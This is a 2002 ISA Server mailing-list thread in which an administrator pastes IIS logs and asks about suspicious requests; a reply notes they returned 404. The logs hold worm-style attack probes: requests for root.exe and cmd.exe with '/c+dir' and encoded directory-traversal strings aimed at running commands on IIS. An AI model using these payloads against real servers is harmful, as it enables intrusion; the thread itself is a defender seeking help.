RE: !!!!URGENT - SCARY website LOGS!!!!
- From: "Sushil Bhalla" <sushilb@xxxxxxxxxxxxxxxxx>
- To: isalist@xxxxxxxxxxxxx
- Date: Wed, 27 Mar 2002 00:09:04 -0700
Thanks very much Joseph for your comments.
Actually, I would like to have W2K, E2K, ISA, ISM all on seperate servers
but I have SBS which limits me to one server only. If there is a way
around this problem, please let me know. I will be very much interested in
having all the processes on seperate servers.
Regards,
Sushil Bhalla
> It is not always a good idea to keep ISA on the same machine with all
> the other applications that you mentioned. =20
> The 404 error code says that your ok meaning url not found.
>
> Joseph
>
> -----Original Message-----
> From: Sushil Bhalla [mailto:sushilb@xxxxxxxxxxxxxxxxx]=20
> Sent: Tuesday, March 26, 2002 10:07 PM
> To: [ISAserver.org Discussion List]
> Subject: [isalist] !!!!URGENT - SCARY website LOGS!!!!
>
> http://www.ISAserver.org
>
>
> Hello All,
>
> I have W2K, E2K, ISA2K, ISM all installed on one server.
>
> Recently I have allowed inbound HTTPServer Inbound (port 80) connection
> (through ISA PACKET FILTERING) to allow my website to be viewed and
> after
> going though my website logs, I got very worried.
>
> Following is what I am getting my logs every few hours.=20
>
> Can someone tell me URGENTALLY what kind of request are these? Should I
> be
> worried? What can I do to prevent these?
>
> Thanks in advance for any help.
>
> Sushil Bhalla
>
> #Date: 2002-03-27 00:19:03
> #Fields: date time c-ip cs-username s-sitename s-computername s-ip
> s-port
> cs-method cs-uri-stem cs-uri-query sc-status sc-win32-status sc-bytes
> cs-bytes time-taken cs-version cs-host cs(User-Agent) cs(Cookie)
> cs(Referer)
> 2002-03-27 00:19:03 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /scripts/root.exe /c+dir 404 3 3396 72 15 HTTP/1.0 www - - -
> 2002-03-27 00:19:04 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /MSADC/root.exe /c+dir 404 3 3396 70 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:09 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /c/winnt/system32/cmd.exe /c+dir 404 3 3396 80 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:10 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /d/winnt/system32/cmd.exe /c+dir 404 3 3396 80 16 HTTP/1.0 www - - -
> 2002-03-27 00:19:11 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 3 3396 96 16 HTTP/1.0
> www - - -
> 2002-03-27 00:19:14 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3
> 3396
> 117 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:19 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 3
> 3396
> 117 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:20 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /msadc/..%5c../..%5c../..%5c/..=C1=1C../..=C1=1C../..=C1=1C../winnt/syste=
> m32/cmd.exe
> /c+dir 404 3 3396 145 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:22 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /scripts/..=C1=1C../winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 =
> HTTP/1.0
> www
> - - -
> 2002-03-27 00:19:23 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /scripts/winnt/system32/cmd.exe /c+dir 404 3 3396 97 15 HTTP/1.0 www - -
> -
> 2002-03-27 00:19:25 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /winnt/system32/cmd.exe /c+dir 404 3 3396 97 0 HTTP/1.0 www - - -
> 2002-03-27 00:19:27 203.200.51.30 - W3SVC3 SERVER mye.xte.rna.lip 80 GET
> /winnt/system32/cmd.exe /c+dir 404 3 3396 97 16 HTTP/1.0 www - - -
>
> ------------------------------------------------------
> You are currently subscribed to this ISAserver.org Discussion List as:
> cismic@xxxxxxx
> To unsubscribe send a blank email to $subst('Email.Unsub')
Other related posts: